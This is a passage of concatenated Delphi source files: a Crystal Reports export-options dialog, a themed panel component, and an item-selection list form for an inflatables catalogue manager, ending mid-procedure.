rLinesPerPage := Cr.ExportOptions.Text.LinesPerPage; rCharPerInch := Cr.ExportOptions.Text.CharPerInch; rRecordsType := Ord(Cr.ExportOptions.Text.RecordsType); {MSWord} rWordFirstPage := Cr.ExportOptions.Word.FirstPage; rWordLastPage := Cr.ExportOptions.Word.LastPage; rWordPrompt := Cr.ExportOptions.Word.Prompt; rWordUsePageRange := Cr.ExportOptions.Word.UsePageRange; {XML} rXMLPrompt := Cr.ExportOptions.XML.Prompt; rXMLSeparatePages := Cr.ExportOptions.XML.SeparatePages; {Set the Active FileType} rgFileType.ItemIndex := Ord(Cr.ExportOptions.FileType); case rgFileType.ItemIndex of 1,8,11 : btnOptions.Enabled := False; 0,2,3,4,5,6,7,9,10,12,13 : btnOptions.Enabled := True; end; {FileName} editFileName.Text := Cr.ExportOptions.FileName; {Set Destination, Form Height, Panels} rgDestination.ItemIndex := Ord(Cr.ExportOptions.Destination); rgDestinationClick(Self); {Check Boxes} cbPromptForOptions.Checked := Cr.ExportOptions.PromptForOptions; cbPromptOnOverwrite.Checked := Cr.ExportOptions.PromptOnOverwrite; cbProgressDialog.Checked := Cr.ProgressDialog; end; {------------------------------------------------------------------------------} { btnOptionsClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.btnOptionsClick(Sender: TObject); begin case rgFileType.ItemIndex of 0 : begin CrpeAdobeAcrobatPDFDlg := TCrpeAdobeAcrobatPDFDlg.Create(Application); CrpeAdobeAcrobatPDFDlg.Cr := Cr; CrpeAdobeAcrobatPDFDlg.ShowModal; end; 1 : {CrystalReportRPT, no options}; 2 : begin CrpeHTML4Dlg := TCrpeHTML4Dlg.Create(Application); CrpeHTML4Dlg.Cr := Cr; CrpeHTML4Dlg.ShowModal; end; 3 : begin CrpeHTML4Dlg := TCrpeHTML4Dlg.Create(Application); CrpeHTML4Dlg.Cr := Cr; CrpeHTML4Dlg.ShowModal; end; 4 : begin CrpeExcelDlg := TCrpeExcelDlg.Create(Application); CrpeExcelDlg.Cr := Cr; CrpeExcelDlg.ShowModal; end; 5 : begin CrpeWordDlg := TCrpeWordDlg.Create(Application); CrpeWordDlg.Cr := Cr; CrpeWordDlg.ShowModal; end; 6 : begin CrpeOdbcDlg := TCrpeOdbcDlg.Create(Application); CrpeOdbcDlg.Cr := Cr; CrpeOdbcDlg.ShowModal; end; 7 : begin CrpeExportRecordsDlg := TCrpeExportRecordsDlg.Create(Application); CrpeExportRecordsDlg.Cr := Cr; CrpeExportRecordsDlg.ShowModal; end; 8 : {ReportDefinition, no options}; 9 : begin CrpeRichTextFormatDlg := TCrpeRichTextFormatDlg.Create(Application); CrpeRichTextFormatDlg.Cr := Cr; CrpeRichTextFormatDlg.ShowModal; end; 10 : begin CrpeSepValDlg := TCrpeSepValDlg.Create(Application); CrpeSepValDlg.Cr := Cr; CrpeSepValDlg.ShowModal; end; 11 : {TabSeparatedText, no options}; 12 : begin CrpePagTextDlg := TCrpePagTextDlg.Create(Application); CrpePagTextDlg.Cr := Cr; CrpePagTextDlg.ShowModal; end; 13 : begin CrpeXML1Dlg := TCrpeXML1Dlg.Create(Application); CrpeXML1Dlg.Cr := Cr; CrpeXML1Dlg.ShowModal; end; end; end; {------------------------------------------------------------------------------} { rgFileTypeClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.rgFileTypeClick(Sender: TObject); var OnOff : boolean; begin case rgFileType.ItemIndex of 0 : Cr.ExportOptions.FileType := AdobeAcrobatPDF; 1 : Cr.ExportOptions.FileType := CrystalReportRPT; 2 : Cr.ExportOptions.FileType := HTML32; 3 : Cr.ExportOptions.FileType := HTML40; 4 : Cr.ExportOptions.FileType := MSExcel; 5 : Cr.ExportOptions.FileType := MSWord; 6 : Cr.ExportOptions.FileType := ODBCTable; 7 : Cr.ExportOptions.FileType := Records; 8 : Cr.ExportOptions.FileType := ReportDefinition; 9 : Cr.ExportOptions.FileType := RichText; 10: Cr.ExportOptions.FileType := SeparatedValues; 11: Cr.ExportOptions.FileType := TabSeparatedText; 12: Cr.ExportOptions.FileType := TextFormat; 13: Cr.ExportOptions.FileType := XML1; end; OnOff := (rgFileType.ItemIndex <> 6); {Set Colors} editFileName.Color := ColorState(OnOff); editFileName.Enabled := OnOff; {Email} editUserName.Color := ColorState(OnOff); editPassword.Color := ColorState(OnOff); editToList.Color := ColorState(OnOff); editCCList.Color := ColorState(OnOff); editSubject.Color := ColorState(OnOff); memoMessage.Color := ColorState(OnOff); {VIM} editVimTo.Color := ColorState(OnOff); editVimCC.Color := ColorState(OnOff); editVimBCC.Color := ColorState(OnOff); editVimSubject.Color := ColorState(OnOff); memoVimMessage.Color := ColorState(OnOff); {Exchange} editProfile.Color := ColorState(OnOff); editFolder.Color := ColorState(OnOff); editExchangePassword.Color := ColorState(OnOff); {LotusNotes} editDBName.Color := ColorState(OnOff); editFormName.Color := ColorState(OnOff); editComments.Color := ColorState(OnOff); {Application} editAFileName.Color := ColorState(OnOff); editAFileName.Enabled := OnOff; editAppName.Color := ColorState(OnOff); editAppName.Enabled := OnOff; {Enable/Disable applicable controls} pcDestination.Enabled := OnOff; case rgFileType.ItemIndex of 1,8,11 : btnOptions.Enabled := False; 0,2,3,4,5,6,7,9,10,12,13 : btnOptions.Enabled := True; end; end; {------------------------------------------------------------------------------} { cbPromptForOptionsClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.cbPromptForOptionsClick(Sender: TObject); var OnOff : Boolean; begin Cr.ExportOptions.PromptForOptions := cbPromptForOptions.Checked; OnOff := not cbPromptForOptions.Checked; if OnOff = True then OnOff := not (rgFileType.ItemIndex = 6); {Set Colors} editFileName.Color := ColorState(OnOff); editFileName.Enabled := OnOff; {Email} editUserName.Color := ColorState(OnOff); editPassword.Color := ColorState(OnOff); editToList.Color := ColorState(OnOff); editCCList.Color := ColorState(OnOff); editSubject.Color := ColorState(OnOff); memoMessage.Color := ColorState(OnOff); {VIM} editVimTo.Color := ColorState(OnOff); editVimCC.Color := ColorState(OnOff); editVimBCC.Color := ColorState(OnOff); editVimSubject.Color := ColorState(OnOff); memoVimMessage.Color := ColorState(OnOff); {Exchange} editProfile.Color := ColorState(OnOff); editFolder.Color := ColorState(OnOff); editExchangePassword.Color := ColorState(OnOff); {LotusNotes} editDBName.Color := ColorState(OnOff); editFormName.Color := ColorState(OnOff); editComments.Color := ColorState(OnOff); {Application} editAFileName.Color := ColorState(OnOff); editAFileName.Enabled := OnOff; editAppName.Color := ColorState(OnOff); editAppName.Enabled := OnOff; {Enable/Disable applicable controls} pcDestination.Enabled := OnOff; end; {------------------------------------------------------------------------------} { cbPromptOnOverwriteClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.cbPromptOnOverwriteClick(Sender: TObject); begin Cr.ExportOptions.PromptOnOverwrite := cbPromptOnOverwrite.Checked; end; {------------------------------------------------------------------------------} { rgExportToClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.rgDestinationClick(Sender: TObject); begin case rgDestination.ItemIndex of {toFile} 0: begin pcDestination.ActivePage := tsToFile; Cr.ExportOptions.Destination := toFile; editFileName.Text := Cr.ExportOptions.FileName; end; {toEmailViaMapi} 1: begin pcDestination.ActivePage := tsToEmailViaMapi; Cr.ExportOptions.Destination := toEmailViaMapi; editUserName.Text := Cr.ExportOptions.Email.UserName; editPassword.Text := Cr.ExportOptions.Email.Password; editToList.Text := Cr.ExportOptions.Email.ToList; editCCList.Text := Cr.ExportOptions.Email.CCList; editSubject.Text := Cr.ExportOptions.Email.Subject; memoMessage.Text := Cr.ExportOptions.Email.Message; end; {toEmailViaVIM} 2: begin pcDestination.ActivePage := tsToEmailViaVim; Cr.ExportOptions.Destination := toEmailViaVIM; editVimTo.Text := Cr.ExportOptions.Email.ToList; editVimCC.Text := Cr.ExportOptions.Email.CCList; editVimBCC.Text := Cr.ExportOptions.Email.BCCList; editVimSubject.Text := Cr.ExportOptions.Email.Subject; memoVimMessage.Text := Cr.ExportOptions.Email.Message; end; {toExchangeFolder} 3: begin pcDestination.ActivePage := tsToMsExchange; Cr.ExportOptions.Destination := toMSExchange; editProfile.Text := Cr.ExportOptions.Exchange.Profile; editFolder.Text := Cr.ExportOptions.Exchange.Folder; editExchangePassword.Text := Cr.ExportOptions.Exchange.Password; end; {toLotusNotes} 4: begin pcDestination.ActivePage := tsToLotusNotes; Cr.ExportOptions.Destination := toLotusNotes; editDBName.Text := Cr.ExportOptions.LotusNotes.DBName; editFormName.Text := Cr.ExportOptions.LotusNotes.FormName; editComments.Text := Cr.ExportOptions.LotusNotes.Comments; end; {toApplication} 5: begin pcDestination.ActivePage := tsToApplication; Cr.ExportOptions.Destination := toApplication; editAFileName.Text := Cr.ExportOptions.FileName; editAppName.Text := Cr.ExportOptions.AppName; end; end; end; {------------------------------------------------------------------------------} { editFileNameChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editFileNameChange(Sender: TObject); begin Cr.ExportOptions.FileName := editFileName.Text; ExportPath := ExtractFilePath(editFileName.Text); end; {------------------------------------------------------------------------------} { editFileNameDblClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editFileNameDblClick(Sender: TObject); const FileExtensions : array[TCrExportType] of string = ('.pdf', '.rpt', '.html', '.html', '.xls', '.doc', '.doc', '', '.rec', '.txt', '.rtf', '.csv', '.ttx', '.txt', '.xml'); FileTypes : array [TCrExportType] of string = ('Portable Document Format', 'Crystal Report', 'HTML 3.2 (Standard)', 'HTML 4.0 (dHTML)', 'MS Excel 97-2000 Workbook', 'MS Word', 'MS Word - Editable', 'Not applicable to ODBC', 'Record Style', 'Report Definition', 'Rich Text Format', 'Separated Values', 'Tab-separated', 'Paginated Text', 'Extensible Markup Language'); var ext : string; begin {Set the Save Dialog Options} SaveDialog1.Title := 'Set Export Path & Filename...'; SaveDialog1.InitialDir := ExportPath; SaveDialog1.FileName := editFileName.Text; ext := FileExtensions[Cr.ExportOptions.FileType]; SaveDialog1.Filter := FileTypes[Cr.ExportOptions.FileType] + ' (' + ext + ')|' + ext + '|All files (*.*) | *.*'; SaveDialog1.Options := [ofPathMustExist, ofHideReadOnly, ofNoReadOnlyReturn]; if SaveDialog1.Execute then begin editFileName.Text := SaveDialog1.Filename; {Store the Export Path for next time} ExportPath := ExtractFilePath(SaveDialog1.Filename); end; end; {------------------------------------------------------------------------------} { Exchange: editProfileChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editProfileChange(Sender: TObject); begin Cr.ExportOptions.Exchange.Profile := editProfile.Text; end; {------------------------------------------------------------------------------} { Exchange: editFolderChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editFolderChange(Sender: TObject); begin Cr.ExportOptions.Exchange.Folder := editFolder.Text; end; {------------------------------------------------------------------------------} { Exchange: editPasswordChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editExchangePasswordChange(Sender: TObject); begin Cr.ExportOptions.Exchange.Password := editExchangePassword.Text; end; {------------------------------------------------------------------------------} { Mapi: editUserNameChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editUserNameChange(Sender: TObject); begin Cr.ExportOptions.Email.UserName := editUserName.Text; end; {------------------------------------------------------------------------------} { Mapi: editPasswordChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editPasswordChange(Sender: TObject); begin Cr.ExportOptions.Email.Password := editPassword.Text; end; {------------------------------------------------------------------------------} { Mapi: editToListChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editToListChange(Sender: TObject); begin Cr.ExportOptions.Email.ToList := editToList.Text; end; {------------------------------------------------------------------------------} { Mapi: editCCListChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editCCListChange(Sender: TObject); begin Cr.ExportOptions.Email.CCList := editCCList.Text; end; {------------------------------------------------------------------------------} { Mapi: editSubjectChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editSubjectChange(Sender: TObject); begin Cr.ExportOptions.Email.Subject := editSubject.Text; end; {------------------------------------------------------------------------------} { Mapi: memoMessageChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.memoMessageChange(Sender: TObject); begin Cr.ExportOptions.Email.Message := memoMessage.Text; end; {------------------------------------------------------------------------------} { VIM: editToListVChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editToListVChange(Sender: TObject); begin Cr.ExportOptions.Email.ToList := editVimTo.Text; end; {------------------------------------------------------------------------------} { VIM: editCCListVChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editCCListVChange(Sender: TObject); begin Cr.ExportOptions.Email.CCList := editVimCC.Text; end; {------------------------------------------------------------------------------} { VIM: editBCCListVChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editBCCListVChange(Sender: TObject); begin Cr.ExportOptions.Email.BCCList := editVimBCC.Text; end; {------------------------------------------------------------------------------} { VIM: editSubjectVChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editSubjectVChange(Sender: TObject); begin Cr.ExportOptions.Email.Subject := editVimSubject.Text; end; {------------------------------------------------------------------------------} { VIM: memoMessageVChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.memoMessageVChange(Sender: TObject); begin Cr.ExportOptions.Email.Message := memoVimMessage.Text; end; {------------------------------------------------------------------------------} { Application: editAFileNameChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editAFileNameChange(Sender: TObject); begin Cr.ExportOptions.FileName := editAFileName.Text; ExportPath := ExtractFilePath(editAFileName.Text); end; {------------------------------------------------------------------------------} { Application: editAFileNameDblClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editAFileNameDblClick(Sender: TObject); const FileExtensions : array[TCrExportType] of string = ('.pdf', '.rpt', '.html', '.html', '.xls', '.doc', '.doc', '', '.rec', '.txt', '.rtf', '.csv', '.ttx', '.txt', '.xml'); FileTypes : array [TCrExportType] of string = ('Portable Document Format', 'Crystal Report', 'HTML 3.2 (Standard)', 'HTML 4.0 (dHTML)', 'MS Excel 97-2000 Workbook', 'MS Word', 'MS Word - Editable', 'Not applicable to ODBC', 'Record Style', 'Report Definition', 'Rich Text Format', 'Separated Values', 'Tab-separated', 'Paginated Text', 'Extensible Markup Language'); var ext : string; begin {Set the Save Dialog Options} SaveDialog1.Title := 'Set Export Path & Filename...'; SaveDialog1.InitialDir := ExportPath; SaveDialog1.FileName := editAFileName.Text; ext := FileExtensions[Cr.ExportOptions.FileType]; SaveDialog1.Filter := FileTypes[Cr.ExportOptions.FileType] + ' (' + ext + ')|' + ext + '|All files (*.*) | *.*'; SaveDialog1.Options := [ofPathMustExist, ofHideReadOnly, ofNoReadOnlyReturn]; if SaveDialog1.Execute then begin editAFileName.Text := SaveDialog1.Filename; {Store the Export Path for next time} ExportPath := ExtractFilePath(SaveDialog1.Filename); end; end; {------------------------------------------------------------------------------} { Application: editAppNameChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editAppNameChange(Sender: TObject); begin Cr.ExportOptions.AppName := editAppName.Text; end; {------------------------------------------------------------------------------} { Application: editAppNameDblClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.editAppNameDblClick(Sender: TObject); begin {Set the Save Dialog Options} SaveDialog1.Title := 'Select Application...'; SaveDialog1.InitialDir := ExportPath; SaveDialog1.FileName := editAppName.Text; SaveDialog1.Filter := 'Application Files (*.exe) | *.exe|All files (*.*) | *.*'; SaveDialog1.Options := [ofPathMustExist, ofFileMustExist, ofHideReadOnly]; if SaveDialog1.Execute then editAppName.Text := SaveDialog1.Filename; end; {------------------------------------------------------------------------------} { pcDestinationChange procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.pcDestinationChange(Sender: TObject); var i: integer; begin {Update the Export Destination radio button with the Active Destination Page} for i := 0 to pcDestination.PageCount - 1 do begin if pcDestination.Pages[i] = pcDestination.ActivePage then Break; end; rgDestination.ItemIndex := i; end; {------------------------------------------------------------------------------} { cbProgressDialogClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.cbProgressDialogClick(Sender: TObject); begin Cr.ProgressDialog := cbProgressDialog.Checked; end; {------------------------------------------------------------------------------} { cbKeepOpenClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.cbKeepOpenClick(Sender: TObject); begin if cbKeepOpen.Checked = True then btnExport.ModalResult := mrNone else btnExport.ModalResult := mrOk; end; {------------------------------------------------------------------------------} { btnExportClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.btnExportClick(Sender: TObject); var stop : boolean; prevOut : TCrOutput; begin {Initialize stop variable} stop := False; if not cbPromptForOptions.Checked then begin {Check to make sure output file is specified} case rgDestination.ItemIndex of 0: {toFile} begin if Cr.ExportOptions.FileType <> ODBCTable then begin if editFileName.Text = '' then begin if MessageDlg('No Export FileName entered!' + Chr(10) + 'Continue anyway?', mtWarning, [mbYes, mbNo], 0) = mrNo then stop := True; end end; end; 1: {toEmailViaMapi} begin if editToList.Text = '' then begin if MessageDlg('No "To:" address entered!' + Chr(10) + 'Continue anyway?', mtWarning, [mbYes, mbNo], 0) = mrNo then stop := True; end; end; 2: {toEmailViaVIM} begin if editVimTo.Text = '' then begin if MessageDlg('No "To:" address entered!' + Chr(10) + 'Continue anyway?', mtWarning, [mbYes, mbNo], 0) = mrNo then stop := True; end; end; 3: {toMSExchange} begin if editProfile.Text = '' then begin if MessageDlg('No Exchange Profile entered!' + Chr(10) + 'Continue anyway?', mtWarning, [mbYes, mbNo], 0) = mrNo then stop := True; end; end; 4: {toLotusNotes} begin if editDBName.Text = '' then begin if MessageDlg('No Lotus Notes DBName entered!' + Chr(10) + 'Continue anyway?', mtWarning, [mbYes, mbNo], 0) = mrNo then stop := True; end; end; 5: {toApplication} begin if Cr.ExportOptions.FileType <> ODBCTable then begin if editAFileName.Text = '' then begin if MessageDlg('No Export FileName entered!' + Chr(10) + 'Continue anyway?', mtWarning, [mbYes, mbNo], 0) = mrNo then stop := True; end; end; end; end; end; if stop = False then begin prevOut := Cr.Output; Cr.Export; Cr.Output := prevOut; if not cbKeepOpen.Checked then Close; end else ModalResult := mrNone; end; {------------------------------------------------------------------------------} { btnOkClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.btnOkClick(Sender: TObject); begin SaveFormPos(Self); Close; end; {------------------------------------------------------------------------------} { btnCancelClick procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.btnCancelClick(Sender: TObject); begin {Restore Original Settings} Cr.ExportOptions.AppName := rAppName; Cr.ExportOptions.FileName := rFileName; Cr.ExportOptions.FileType := TCrExportType(rFileType); Cr.ExportOptions.Destination := TCrExportDestination(rDestination); Cr.ExportOptions.PromptForOptions := rPromptForOptions; Cr.ExportOptions.PromptOnOverwrite := rPromptOnOverwrite; {Email} Cr.ExportOptions.Email.CCList := rCCList; Cr.ExportOptions.Email.Message := rMessage; Cr.ExportOptions.Email.Subject := rSubject; Cr.ExportOptions.Email.ToList := rToList; Cr.ExportOptions.Email.BCCList := rBCCList; Cr.ExportOptions.Email.UserName := rUserName; Cr.ExportOptions.Email.Password := rPassword; {Exchange} Cr.ExportOptions.Exchange.Folder := rFolder; Cr.ExportOptions.Exchange.Password := rPassword; Cr.ExportOptions.Exchange.Profile := rProfile; {LotusNotes} Cr.ExportOptions.LotusNotes.DBName := rDBName; Cr.ExportOptions.LotusNotes.FormName := rFormName; Cr.ExportOptions.LotusNotes.Comments := rComments; {Excel} Cr.ExportOptions.Excel.Area := rArea; Cr.ExportOptions.Excel.ColumnWidth := TCrColumnWidth(rColumnWidth); Cr.ExportOptions.Excel.Constant := rConstant; Cr.ExportOptions.Excel.WorksheetFunctions := rWorksheetFunctions; Cr.ExportOptions.Excel.XLSType := TCrExportExcelType(rXLSType); Cr.ExportOptions.Excel.ChopPageHeader := rChopPageHeader; Cr.ExportOptions.Excel.ConvertDatesToStrings := rConvertDatesToStrings; Cr.ExportOptions.Excel.CreatePageBreaks := rCreatePageBreaks; Cr.ExportOptions.Excel.ExportHeaderFooter := rExportHeaderFooter; Cr.ExportOptions.Excel.FirstPage := rExcelFirstPage; Cr.ExportOptions.Excel.LastPage := rExcelLastPage; Cr.ExportOptions.Excel.UsePageRange := rExcelUsePageRange; {HTML} Cr.ExportOptions.HTML.PageNavigator := rPageNavigator; Cr.ExportOptions.HTML.SeparatePages := rSeparatePages; Cr.ExportOptions.HTML.FirstPage := rHTMLFirstPage; Cr.ExportOptions.HTML.LastPage := rHTMLLastPage; Cr.ExportOptions.HTML.UsePageRange := rHTMLUsePageRange; {ODBC} Cr.ExportOptions.ODBC.Password := rODBCPassword; Cr.ExportOptions.ODBC.Source := rODBCSource; Cr.ExportOptions.ODBC.Table := rODBCTable; Cr.ExportOptions.ODBC.User := rODBCUser; Cr.ExportOptions.ODBC.Prompt := rODBCPrompt; {PDF} Cr.ExportOptions.PDF.Prompt := rPDFPrompt; Cr.ExportOptions.PDF.UsePageRange := rPDFUsePageRange; Cr.ExportOptions.PDF.FirstPage := rPDFFirstPage; Cr.ExportOptions.PDF.LastPage := rPDFLastPage; {RTF} Cr.ExportOptions.RTF.Prompt := rRTFPrompt; Cr.ExportOptions.RTF.UsePageRange := rRTFUsePageRange; Cr.ExportOptions.RTF.FirstPage := rRTFFirstPage; Cr.ExportOptions.RTF.LastPage := rRTFLastPage; {Text} Cr.ExportOptions.Text.UseRptNumberFmt := rUseRptNumberFmt; Cr.ExportOptions.Text.UseRptDateFmt := rUseRptDateFmt; Cr.ExportOptions.Text.StringDelimiter := rStringDelimiter; Cr.ExportOptions.Text.FieldSeparator := rFieldSeparator; Cr.ExportOptions.Text.LinesPerPage := rLinesPerPage; Cr.ExportOptions.Text.CharPerInch := rCharPerInch; Cr.ExportOptions.Text.RecordsType := TCrRecordsType(rRecordsType); {MSWord} Cr.ExportOptions.Word.Prompt := rWordPrompt; Cr.ExportOptions.Word.UsePageRange := rWordUsePageRange; Cr.ExportOptions.Word.FirstPage := rWordFirstPage; Cr.ExportOptions.Word.LastPage := rWordLastPage; {XML} Cr.ExportOptions.XML.SeparatePages := rXMLSeparatePages; Cr.ExportOptions.XML.Prompt := rXMLPrompt; Close; end; {------------------------------------------------------------------------------} { FormClose procedure } {------------------------------------------------------------------------------} procedure TCrpeExportOptionsDlg.FormClose(Sender: TObject; var Action: TCloseAction); begin bExportOptions := False; Release; end; end.
unit LiteBackground; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, ExtCtrls, uColorTheme; { Lite Label } type TLiteBackground = class(Tpanel, IUnknown, IThemeSupporter) private theme: ColorTheme; protected public constructor Create(AOwner: TComponent); override; // IThemeSupporter procedure setTheme(theme: ColorTheme); function getTheme(): ColorTheme; procedure updateColors(); published end; procedure Register; implementation procedure Register; begin RegisterComponents('Lite', [TLiteBackground]); end; // Override constructor TLiteBackground.Create(AOwner: TComponent); begin inherited Create(AOwner); theme := CT_DEFAULT_THEME; updateColors(); BevelOuter := bvNone; end; // Override procedure TLiteBackground.setTheme(theme: ColorTheme); var i: integer; supporter: IThemeSupporter; begin self.theme := theme; // link for i := 0 to ControlCount - 1 do if Supports(controls[i], IThemeSupporter, supporter) then supporter.setTheme(theme); end; // Override function TLiteBackground.getTheme(): ColorTheme; begin getTheme := theme; end; // Override procedure TLiteBackground.updateColors(); var i: integer; supporter: IThemeSupporter; begin Color := theme.background; for i := 0 to ControlCount - 1 do if Supports(controls[i], IThemeSupporter, supporter) then supporter.updateColors(); end; end.
unit ItemSelectForm; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, InflatablesList_Manager; type TfItemSelectForm = class(TForm) lblItems: TLabel; lbItems: TListBox; btnAccept: TButton; btnCancel: TButton; procedure FormCreate(Sender: TObject); procedure FormDestroy(Sender: TObject); procedure lbItemsClick(Sender: TObject); procedure lbItemsDblClick(Sender: TObject); procedure lbItemsDrawItem(Control: TWinControl; Index: Integer; Rect: TRect; State: TOwnerDrawState); procedure btnAcceptClick(Sender: TObject); procedure btnCancelClick(Sender: TObject); private { Private declarations } fDrawBuffer: TBitmap; fILManager: TILManager; fAccepted: Boolean; protected procedure FillList; procedure UpdateIndex; public { Public declarations } procedure Initialize(ILManager: TILManager); procedure Finalize; Function ShowItemSelect(const Title: String; Selected: Integer = -1): Integer; end; var fItemSelectForm: TfItemSelectForm; implementation {$R *.dfm} uses InflatablesList_Utils, InflatablesList_Item; procedure TfItemSelectForm.FillList; var i: Integer; begin //don't forget fDataAccessible lbItems.Items.BeginUpdate; try lbItems.Items.Clear; For i := fILManager.ItemLowIndex to fILManager.ItemHighIndex do If fILManager[i].DataAccessible then lbItems.AddItem(fILManager[i].TitleStr,fILManager[i]); finally lbItems.Items.EndUpdate; end; If lbItems.Count > 0 then lbItems.ItemIndex := 0; lbItems.OnClick(nil); end; //------------------------------------------------------------------------------ procedure TfItemSelectForm.UpdateIndex; begin If lbItems.Count > 0 then begin If lbItems.ItemIndex >= 0 then lblItems.Caption := IL_Format('Items (%d/%d):',[lbItems.ItemIndex + 1,lbItems.Count]) else lblItems.Caption := IL_Format('Items (%d):',[lbItems.Count]); end else lblItems.Caption := 'Items:'; end; //============================================================================== procedure TfItemSelectForm.Initialize(ILManager: TILManager); begin fILManager := ILManager; end; //------------------------------------------------------------------------------ procedure TfItemSelectForm.Finalize; begin // nothing to do here end; //------------------------------------------------------------------------------ Function TfItemSelectForm.ShowItemSelect(const Title: String; Selected: Integer = -1): Integer; var i: Integer; begin Caption := Title; FillList; If fILManager.CheckIndex(Selected) then begin lbItems.ItemIndex := Selected; lbItems.OnClick(nil); // scroll so that the item is at the top if possible If lbItems.Count > (lbItems.ClientHeight div lbItems.ItemHeight) then begin If (lbItems.Count - Selected) < (lbItems.ClientHeight div lbItems.ItemHeight) then lbItems.TopIndex := lbItems.Count - (lbItems.ClientHeight div lbItems.ItemHeight) else lbItems.TopIndex := Selected; end; end; fAccepted := False; // reinit renders For i := 0 to Pred(lbItems.Count) do with TILItem(lbItems.Items.Objects[i]) do begin BeginUpdate; try ReinitSmallDrawSize(lbItems.ClientWidth,lbItems.ItemHeight,lbItems.Font); ChangeSmallStripSize(-1); finally EndUpdate; end; end; ShowModal; If fAccepted then Result := TILItem(lbItems.Items.Objects[lbItems.ItemIndex]).Index else Result := -1; end; //============================================================================== procedure TfItemSelectForm.FormCreate(Sender: TObject); begin fDrawBuffer := TBitmap.Create; fDrawBuffer.PixelFormat := pf24bit; fDrawBuffer.Canvas.Font.Assign(lbItems.Font); lbItems.DoubleBuffered := True; end; //------------------------------------------------------------------------------ procedure TfItemSelectForm.FormDestroy(Sender: TObject); begin FreeAndNil(fDrawBuffer); end; //------------------------------------------------------------------------------ procedure TfItemSelectForm.lbItemsClick(Sender: TObject); begin UpdateIndex; end; //------------------------------------------------------------------------------ procedure TfItemSelectForm.lbItemsDblClick(Sender: TObject); begin UpdateIndex; If lbItems.ItemIndex >= 0 then btnAccept.OnClick(nil); end; //------------------------------------------------------------------------------ procedure TfItemSelectForm.lbItemsDrawItem(Control: TWinControl; Index: Integer; Rect: TRect; State: TOwnerDrawState); var BoundsRect: TRect; TempItem: TILItem; TempInt: Integer; TempStr: String; begin If Assigned(fDrawBuffer) then begin // adjust draw buffer size If fDrawBuffer.Width < (Rect.Right - Rect.Left) then fDrawBuffer.Width := Rect.Right - Rect.Left; If fDrawBuffer.Height < (Rect.Bottom - Rect.Top) then fDrawBuffer.Height := Rect.Bottom - Rect.Top; BoundsRect := Classes.Rect(0,0,Rect.Right - Rect.Left,Rect.Bottom - Rect.Top); with fDrawBuffer.Canvas do begin TempItem := TILItem(lbItems.Items.Objects[Index]); // content Draw(BoundsRect.Left,BoundsRect.Top,TempItem.RenderSmall); TempItem.RenderSmall.Dormant; // separator line Pen.Style := psSolid; Pen.Color := clSilver; MoveTo(BoundsRect.Left,Pred(BoundsRect.Bottom)); LineTo(BoundsRect.Right,Pred(BoundsRect.Bottom)); // marker Pen.Style := psClear; Brush.Style := bsSolid; Brush.Color := $00F7F7F7; Rectangle(BoundsRect.Left,BoundsRect.Top,BoundsRect.Left + TempItem.SmallStrip,BoundsRect.Bottom); // indicate pictures by glyphs TempInt := fDrawBuffer.Width - 61; Pen.Style := psSolid; If TempItem.Pictures.SecondaryCount(False) > 0 then begin Dec(TempInt,14); Pen.Color := $00FFAC22; Brush.Style := bsSolid; Brush.Color := $00FFBF55; Polygon([Point(TempInt,5),Point(TempInt,16),Point(TempInt + 11,11)]); If TempItem.Pictures.SecondaryCount(False) > 1 then begin Font.Size := 8; Font.Style := [fsBold]; Brush.Style := bsClear; TempStr := IL_Format('%dx',[TempItem.Pictures.SecondaryCount(False)]); Dec(TempInt,TextWidth(TempStr) + 3); TextOut(TempInt,4,TempStr); end; end; If TempItem.Pictures.CheckIndex(TempItem.Pictures.IndexOfPackagePicture) then begin Dec(TempInt,14); Pen.Color := $0000D3D9; Brush.Style := bsSolid; Brush.Color := $002BFAFF; Rectangle(TempInt,5,TempInt + 11,16); end; If TempItem.Pictures.CheckIndex(TempItem.Pictures.IndexOfItemPicture) then begin Dec(TempInt,14); Pen.Color := $0000E700; Brush.Style := bsSolid; Brush.Color := clLime; Ellipse(TempInt,5,TempInt + 11,16); end; // states If odSelected in State then begin Pen.Style := psClear; Brush.Style := bsSolid; Brush.Color := clLime; 